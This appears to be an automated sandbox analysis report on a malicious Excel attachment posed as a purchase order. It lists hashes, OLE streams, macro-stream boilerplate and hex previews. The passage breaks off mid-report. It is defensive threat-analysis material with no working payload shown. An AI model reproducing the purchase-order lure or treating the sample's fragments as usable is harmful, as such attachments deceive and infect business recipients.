                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Users\user\Desktop\PO#BBGR2411PO69.xls (copy)

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 2 06:24:53 2024, Security: 1
                                                  Category:dropped
                                                  Size (bytes):988160
                                                  Entropy (8bit):7.757867987862203
                                                  Encrypted:false
                                                  SSDEEP:12288:/SmzHJEUiOIBUzMTS7D3DERnLRmF8DhEPWxpsAQx1Zj+jYEPO5X79mP8sTm+WDF9:tBaybARM8Aw8Z+jPOp79mQTFqja
                                                  MD5:A45CF6FD74DC6D289240651822BFBACA
                                                  SHA1:646BFA8A27C92ACF95A74E56383125BBF43FFFC8
                                                  SHA-256:2170DE0D94AEEEFA0D82131F4EA9588998B0296D53D9891C0D4CA5A14BBB7F52
                                                  SHA-512:5A4D62F599CD68E5F3E19D46174E9EF9BB64456C066727D30613FCD9ADB0A0138E30365B5933C662BC44E8CF63D5DCDD5C55E3395F3BFB72245A7FB35CAD40C6
                                                  Malicious:true
                                                  Preview:......................>.......................................................................5...6...7...............g.......i.......k...............................................................................................................................................................................................................................................................................................................................................................................................4...B............................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                  Static File Info

                                                  General

                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 2 02:20:48 2024, Security: 1
                                                  Entropy (8bit):7.758468903603302
                                                  TrID:
                                                  • Microsoft Excel sheet (30009/1) 47.99%
                                                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                  File name:PO#BBGR2411PO69.xls
                                                  File size:987'136 bytes
                                                  MD5:ff6ca372d80251aeadd10122ac4d46c0
                                                  SHA1:26543f78c7c1bfad35c0e3e2acb9d5972cbd1257
                                                  SHA256:8bd6a8555939af5f504e3bcadfa876e1447cadbcbd163b340cd784cafd4dfd8c
                                                  SHA512:bbe2db5915709cb355207b5f73356cd6c5b451039e19e54911e1b6d09bf29ca9f39c7d18f991681d6993be7324095071586b4c5a63b970998d983ccf21b3de0d
                                                  SSDEEP:12288:GSmzHJEUiOIBUzMTSLD3DERnLRmF8DhEPGxpsAQx1Zj+jgEPBqAZFsOYjPxRdoy7:GBaibARM8Ag8Z+jHoRPlx
                                                  TLSH:6525F1D2B68DAB12CA55123535F387AE2724AC53D912467B23F8B3192FF76C08543F86
                                                  File Content Preview:........................>.......................................................................5...6...7...............g.......i.......k......................................................................................................................

                                                  File Icon

                                                  Icon Hash:276ea3a6a6b7bfbf

                                                  Static OLE Info

                                                  General

                                                  Document Type:OLE
                                                  Number of OLE Files:1

                                                  OLE File "PO#BBGR2411PO69.xls"

                                                  Indicators
                                                  Has Summary Info:
                                                  Application Name:Microsoft Excel
                                                  Encrypted Document:True
                                                  Contains Word Document Stream:False
                                                  Contains Workbook/Book Stream:True
                                                  Contains PowerPoint Document Stream:False
                                                  Contains Visio Document Stream:False
                                                  Contains ObjectPool Stream:False
                                                  Flash Objects Count:0
                                                  Contains VBA Macros:True
                                                  Summary
                                                  Code Page:1252
                                                  Author:
                                                  Last Saved By:
                                                  Create Time:2006-09-16 00:00:00
                                                  Last Saved Time:2024-12-02 02:20:48
                                                  Creating Application:Microsoft Excel
                                                  Security:1
                                                  Document Summary
                                                  Document Code Page:1252
                                                  Thumbnail Scaling Desired:False
                                                  Contains Dirty Links:False
                                                  Shared Document:False
                                                  Changed Hyperlinks:False
                                                  Application Version:786432

                                                  Streams with VBA

                                                  VBA File Name: Sheet1.cls, Stream Size: 977
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
                                                  VBA File Name:Sheet1.cls
                                                  Stream Size:977
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  VBA Code
                                                  Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                  VBA File Name: Sheet2.cls, Stream Size: 977
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
                                                  VBA File Name:Sheet2.cls
                                                  Stream Size:977
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  VBA Code
                                                  Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                  VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                  VBA File Name:ThisWorkbook.cls
                                                  Stream Size:985
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  VBA Code
                                                  Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                  Streams

                                                  Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                  General
                                                  Stream Path:\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:114
                                                  Entropy:4.25248375192737
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                  General
                                                  Stream Path:\x5DocumentSummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:244
                                                  Entropy:2.889430592781307
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                  General
                                                  Stream Path:\x5SummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:200
                                                  Entropy:3.2341247550157988
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . @ ` D . . . . . . . . .
                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                  Stream Path: MBD007009DB/\x1CompObj, File Type: data, Stream Size: 114
                                                  General
                                                  Stream Path:MBD007009DB/\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:114
                                                  Entropy:4.25248375192737
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: MBD007009DB/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                  General
                                                  Stream Path:MBD007009DB/\x5DocumentSummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:244
                                                  Entropy:2.701136490257069
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                  Stream Path: MBD007009DB/\x5SummaryInformation, File Type: data, Stream Size: 220
                                                  General
                                                  Stream Path:MBD007009DB/\x5SummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:220
                                                  Entropy:3.372234242231489
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                                                  Stream Path: MBD007009DB/MBD0018D4CE/\x1Ole, File Type: data, Stream Size: 20
                                                  General
                                                  Stream Path:MBD007009DB/MBD0018D4CE/\x1Ole
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:20
                                                  Entropy:0.5689955935892812
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                  Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: MBD007009DB/MBD0018D4CE/\x3ObjInfo, File Type: data, Stream Size: 4
                                                  General
                                                  Stream Path:MBD007009DB/MBD0018D4CE/\x3ObjInfo
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:4
                                                  Entropy:0.8112781244591328
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . .
                                                  Data Raw:00 00 03 00
                                                  Stream Path: MBD007009DB/MBD0018D4CE/Contents, File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c, Stream Size: 197671
                                                  General
                                                  Stream Path:MBD007009DB/MBD0018D4CE/Contents
                                                  CLSID:
                                                  File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                  Stream Size:197671
                                                  Entropy:6.989042939766534
                                                  Base64 Encoded:True
                                                  Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: MBD007009DB/MBD0068D442/\x1CompObj, File Type: data, Stream Size: 114
                                                  General
                                                  Stream Path:MBD007009DB/MBD0068D442/\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:114
                                                  Entropy:4.219515110876372
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: MBD007009DB/MBD0068D442/Package, File Type: Microsoft Excel 2007+, Stream Size: 26243
                                                  General
                                                  Stream Path:MBD007009DB/MBD0068D442/Package
                                                  CLSID:
                                                  File Type:Microsoft Excel 2007+
                                                  Stream Size:26243
                                                  Entropy:7.635433729726103
                                                  Base64 Encoded:True
                                                  Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: MBD007009DB/MBD007203CB/\x1CompObj, File Type: data, Stream Size: 114
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:114
                                                  Entropy:4.25248375192737
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: MBD007009DB/MBD007203CB/\x5DocumentSummaryInformation, File Type: data, Stream Size: 248
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/\x5DocumentSummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:248
                                                  Entropy:3.0523231150355867
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
                                                  Stream Path: MBD007009DB/MBD007203CB/\x5SummaryInformation, File Type: data, Stream Size: 256
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/\x5SummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:256
                                                  Entropy:4.086306928392587
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
                                                  Stream Path: MBD007009DB/MBD007203CB/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 134792
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/Workbook
                                                  CLSID:
                                                  File Type:Applesoft BASIC program data, first line number 16
                                                  Stream Size:134792
                                                  Entropy:7.974168320310173
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
                                                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
                                                  Stream Path: MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 468
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
                                                  CLSID:
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Stream Size:468
                                                  Entropy:5.269289820125323
                                                  Base64 Encoded:True
                                                  Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
                                                  Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                  Stream Path: MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 83
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:83
                                                  Entropy:3.0672749060249043
                                                  Base64 Encoded:False
                                                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
                                                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
                                                  Stream Path: MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2486
                                                  General
